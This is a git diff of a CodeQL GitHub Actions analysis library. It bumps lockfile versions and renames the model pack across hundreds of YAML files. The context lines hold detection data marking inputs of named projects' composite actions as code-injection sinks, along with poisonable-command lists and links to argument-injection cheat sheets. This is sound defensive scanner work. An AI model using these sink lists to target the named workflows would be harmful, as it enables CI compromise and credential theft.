ql/lib/ext/manual/tibdex_backport.model.yml | 2 +- .../tim-actions_get-pr-commits.model.yml | 2 +- .../manual/timheuer_base64-to-file.model.yml | 2 +- .../manual/tj-actions_branch-names.model.yml | 2 +- ...tmelliottjr_extract-regex-action.model.yml | 2 +- .../trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- .../manual/tzkhan_pr-update-action.model.yml | 2 +- .../manual/veracode_veracode-sca.model.yml | 2 +- .../w3f_action-find-old-files.model.yml | 2 +- .../wearerequired_lint-action.model.yml | 2 +- .../ext/manual/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 2 +- ...rted_pull-request-comment-branch.model.yml | 2 +- .../manual/yumemi-inc_changed-files.model.yml | 2 +- .../manual/zaproxy_action-baseline.model.yml | 2 +- .../manual/zaproxy_action-full-scan.model.yml | 2 +- ...zentered_issue-forms-body-parser.model.yml | 2 +- 792 files changed, 833 insertions(+), 823 deletions(-)
diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml
index 21e0b8bb0e91..c4ef87bc2512 100644
--- a/ql/lib/codeql-pack.lock.yml
+++ b/ql/lib/codeql-pack.lock.yml
@@ -2,15 +2,25 @@ lockVersion: 1.0.0
 dependencies:
 codeql/controlflow:
- version: 1.0.1
+ version: 1.0.10
 codeql/dataflow:
- version: 1.0.1
+ version: 1.1.4
+ codeql/javascript-all:
+ version: 2.0.2
+ codeql/mad:
+ version: 1.0.10
+ codeql/regex:
+ version: 1.0.10
 codeql/ssa:
- version: 1.0.1
+ version: 1.0.10
+ codeql/tutorial:
+ version: 1.0.10
 codeql/typetracking:
- version: 1.0.1
+ version: 1.0.10
 codeql/util:
- version: 1.0.1
+ version: 1.0.10
+ codeql/xml:
+ version: 1.0.10
 codeql/yaml:
- version: 1.0.1
+ version: 1.0.10
 compiled: false
diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml
index 56fced44da8b..3214ce522876 100644
--- a/ql/lib/ext/config/argument_injection_sinks.yml
+++ b/ql/lib/ext/config/argument_injection_sinks.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: argumentInjectionSinksDataModel
 # https://gtfobins.github.io/
 # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection
diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml
index 4d28fa778e0f..930a4344e12e 100644
--- a/ql/lib/ext/config/context_event_map.yml
+++ b/ql/lib/ext/config/context_event_map.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: contextTriggerDataModel
 data:
 - ["commit_comment", "github.event.comment"]
diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml
index 7d40620e9139..e1bfca52ea79 100644
--- a/ql/lib/ext/config/externally_triggereable_events.yml
+++ b/ql/lib/ext/config/externally_triggereable_events.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: externallyTriggerableEventsDataModel
 data:
 - ["discussion"]
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index 2f03b94b4027..bca33af8dc5a 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: poisonableActionsDataModel
 # source: https://boostsecurityio.github.io/lotp/
 data:
@@ -13,7 +13,7 @@ extensions:
 - ["qcastel/github-actions-maven/actions/maven"]
 - ["sonarsource/sonarcloud-github-action"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: poisonableCommandsDataModel
 # source: https://boostsecurityio.github.io/lotp/
 data:
@@ -61,7 +61,7 @@ extensions:
 - ["yarn"]
 - ["webpack"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: poisonableLocalScriptsDataModel
 data:
 # TODO: It could also be in the form of `dir/cmd`
diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml
index 1e54fa6eca3f..cf3d6df80949 100644
--- a/ql/lib/ext/config/untrusted_event_properties.yml
+++ b/ql/lib/ext/config/untrusted_event_properties.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: untrustedEventPropertiesDataModel
 data:
 # TITLE
diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml
index 653f9e31c983..c81c048e45eb 100644
--- a/ql/lib/ext/config/untrusted_gh_command.yml
+++ b/ql/lib/ext/config/untrusted_gh_command.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: untrustedGhCommandDataModel
 data:
 #
diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/ql/lib/ext/config/untrusted_git_command.yml
index e862267027a9..05fda3e1cd9f 100644
--- a/ql/lib/ext/config/untrusted_git_command.yml
+++ b/ql/lib/ext/config/untrusted_git_command.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: untrustedGitCommandDataModel
 data:
 # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r)
diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml
index eb452983bfc5..1fe00ad733bb 100644
--- a/ql/lib/ext/config/vulnerable_actions.yml
+++ b/ql/lib/ext/config/vulnerable_actions.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: vulnerableActionsDataModel
 data:
diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml
index 88e266d8142a..f02a6bc20aa2 100644
--- a/ql/lib/ext/config/workflow_runtime_data.yml
+++ b/ql/lib/ext/config/workflow_runtime_data.yml
@@ -1,9 +1,9 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: repositoryDataModel
 data: []
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: workflowDataModel
 data: []
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
index a098666dba01..ba6dbbe91e62 100644
--- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
+++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
index 476c522f5ea0..b3430655e014 100644
--- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
+++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
index ad369575c423..3c6e8718fb42 100644
--- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
index e68306a454c8..fee02f3d3bde 100644
--- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
index 923d267ac662..c102a42d3ea8 100644
--- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
index 9557cbbee80d..77744b4ab474 100644
--- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
index eea604dc8ddc..e9e6941e6343 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
index 5ee8503193bc..e0240360052b 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
index 44795adc64a0..cae561f77754 100644
--- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
+++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
index a1a7e28f5722..18d893d4c53d 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
index 792a00ea3874..b40d68cc560b 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
index 5ee9c5aefbed..9282d312fb8f 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
index 8b438734d5d6..f0636131cdb0 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
index a62226055750..4bac281500b9 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/arrow", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
index 07c4cc427c10..3ee27175205f 100644
--- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
index 77adcd6151d0..37c2873b508b 100644
--- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/brpc", "*", "input.options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
index fe453b3086d2..231df2a7f879 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
index 6d5296ba6d1f..94ba6559838a 100644
--- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
index 14600fdc23ef..ab91a71fc0e1 100644
--- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
index a67988b08aa8..b704cc54b822 100644
--- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
index 663702e64180..b438360b5a6a 100644
--- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
index de7a728d096c..05b822ebc4d0 100644
--- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/opendal", "*", "input.feature", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
index 360eb948595e..de7c35fa1113 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/pekko", "*", "input.upload", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
index 290712830e2c..4ef3ce32bfed 100644
--- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
index d58063c2452f..0efe533073ba 100644
--- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
index 784627c32abf..a472b1be979e 100644
--- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
index b4f5866b86d4..409c39077866 100644
--- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
index 77a7407adfbf..29a0e582ec7e 100644
--- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
+++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
index a97bce1de7a0..5d88aaf00174 100644
--- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
index 5bf814bcc693..fe2fb29bfa8c 100644
--- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
+++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
index 6a141053bbeb..7107b1dd55d9 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
index 4fec81ed1780..7ecc0cb0e614 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
index 1290646ef6dc..c75ff3a69140 100644
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
index 60a023c97301..ed5dae960604 100644
--- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
+++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
index 1a99c3773de0..a638ceae55ca 100644
--- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
index e3cf5db0f15b..eb67c35e5f5a 100644
--- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
index 67866c4f904c..abfb5157d3bb 100644
--- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
+++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 2317aa06ae2e..f0c798160266 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index baf9c55ff182..5618781b68d6 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 583be58ecd26..b1a2d8e4c363 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] 
